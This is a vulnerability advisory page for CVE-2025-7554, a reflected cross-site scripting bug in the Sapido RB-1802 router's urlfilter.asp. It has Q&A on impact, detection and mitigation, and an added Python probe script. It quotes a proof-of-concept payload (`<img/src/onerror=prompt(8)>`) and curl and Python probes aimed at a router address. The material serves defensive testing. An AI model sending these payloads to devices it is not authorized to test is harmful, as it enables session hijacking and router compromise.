CVE-2025-7554
BaseFortify
Publication date: 2025-07-14
Last updated on: 2026-04-29
Assigner: VulDB
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| sapido | rb-1802 | 1.0.32 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
AI Powered Q&A
Can you explain this vulnerability to me?
This is a cross-site scripting (XSS) vulnerability in the Sapido RB-1802 router, firmware version 1.0.32, in the URL filtering page urlfilter.asp. The value of the URL parameter is written back into the page without validation or output encoding, so an attacker who can get a victim's browser to load a crafted request has arbitrary JavaScript executed in the origin of the router's management interface. The published proof-of-concept payload is `<img/src/onerror=prompt(8)>`: the image source is invalid, so the browser fires the onerror handler as soon as the page renders, which is a standard trick for running script where a plain `<script>` tag might be filtered. The attack can be launched remotely, since the victim only has to follow a link or load a page that issues the request. [1]
How can this vulnerability impact me?
The injected script runs in the origin of the router's management interface, with whatever session the victim's browser currently holds there. That lets an attacker read the session cookie (unless it is marked HttpOnly) and hijack the session, or more directly issue requests to the management interface as the logged-in administrator and make unauthorized configuration changes. Because the device is a network gateway, a compromised administrator session affects every host that routes through it, not only the user who opened the malicious link. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Test the URL filtering page (urlfilter.asp) of the Sapido RB-1802 router directly: send a request that places a typical XSS payload such as `<img/src/onerror=prompt(8)>` in the URL parameter and inspect the response. With a browser, a successful injection shows the prompt dialog. With curl or another HTTP client nothing executes, so the check is whether the payload comes back in the response body verbatim, with its angle brackets intact, rather than HTML-entity encoded (`&lt;img/src/onerror=prompt(8)&gt;`) or absent. Unencoded reflection of the markup is the indicator that the page is vulnerable; only test devices you are authorized to assess, and remember that a management page may require an authenticated session before it reflects anything. [1]
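The check described above, written out as an added example that is not part of the BaseFortify page or of Sapido's firmware. It assumes the injection point is a GET parameter literally named `url` on `/urlfilter.asp` and that the router sits at 192.168.1.1; both are assumptions for illustration, and the two HTTP response bodies are constructed here rather than captured from a device. The network probe is included for a live test, while the classification logic runs offline, and the escaping helper shows the output encoding whose absence makes the page a CWE-79 case.

```python
"""
Added example (not from the BaseFortify page or the Sapido firmware):
reflected-XSS probe logic for a GET parameter, exercised offline against
two constructed HTTP response bodies.
Assumptions (not taken from device output): the vulnerable page is
/urlfilter.asp, the injection point is a GET parameter named ``url``,
and the router address is 192.168.1.1.
"""
import html
import urllib.parse
import urllib.request

# Payload quoted in the advisory text. prompt(8) only runs in a browser;
# an HTTP client can only check whether the markup comes back unencoded.
PAYLOAD = "<img/src/onerror=prompt(8)>"


def build_probe_url(base_url: str, param: str = "url", payload: str = PAYLOAD) -> str:
    """Return the GET URL that places the payload in the given parameter.

    Equivalent manual test (assumed parameter name):
      curl -s -G --data-urlencode 'url=<img/src/onerror=prompt(8)>' \
           http://192.168.1.1/urlfilter.asp | grep -F '<img/src/onerror='
    """
    return base_url + "?" + urllib.parse.urlencode({param: payload})


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Classify how the server echoed the payload.

    'raw'     - payload appears verbatim, markup intact (XSS indicator)
    'encoded' - only an HTML-entity-escaped copy appears (safe handling)
    'absent'  - payload not reflected at all
    """
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body:
        return "encoded"
    return "absent"


def render_safely(before: str, value: str, after: str) -> str:
    """Hardened output: entity-encode untrusted input before it is placed
    in the page. This is the step the vulnerable firmware is missing."""
    return before + html.escape(value, quote=True) + after


def probe(base_url: str, param: str = "url", timeout: float = 5.0) -> str:
    """Live check (network access, authorized targets only): request the
    page with the payload in the parameter and classify the response."""
    req = urllib.request.Request(
        build_probe_url(base_url, param, PAYLOAD),
        headers={"User-Agent": "xss-reflection-probe"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        return classify_reflection(resp.read().decode(charset, errors="replace"))


# Constructed sample bodies (not captured from a device).
# Vulnerable behaviour: the parameter value is echoed into the form as-is.
VULNERABLE_BODY = (
    "<html><body><form><input name=url value=" + PAYLOAD + "></form></body></html>"
)
# Fixed behaviour: the same value, entity-encoded before output.
HARDENED_BODY = render_safely(
    '<html><body><form><input name=url value="', PAYLOAD, '"></form></body></html>'
)

if __name__ == "__main__":
    print("probe URL:       ", build_probe_url("http://192.168.1.1/urlfilter.asp"))
    print("vulnerable sample:", classify_reflection(VULNERABLE_BODY))
    print("hardened sample:  ", classify_reflection(HARDENED_BODY))
```

`classify_reflection` deliberately checks for the verbatim payload before the encoded form: a page that echoes both (for example once in an attribute and once in a script block) is still vulnerable, and the raw copy is what matters. A result of `absent` does not prove the page is safe, since the firmware may reflect the value only after a successful login or only on a different page.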
What immediate steps should I take to mitigate this vulnerability?
Restrict who can reach the router's management interface: allow it only from trusted LAN hosts, disable remote (WAN-side) management, and do not expose urlfilter.asp or the rest of the admin interface to untrusted networks. Check Sapido for firmware newer than 1.0.32 that addresses the issue and apply it if one is released; if the device stays unpatched, treat it as a candidate for replacement. Until then, reduce the window for exploitation: log out of the router's administration pages as soon as configuration work is done rather than leaving a session open in a browser that is also used for general browsing, and be wary of links that point at the router's address. A web application firewall blocking malicious input in the URL parameter only helps if the interface is fronted by a reverse proxy, which is rarely the case for a SOHO router, so the network access restrictions above are the controls that matter in practice. [1]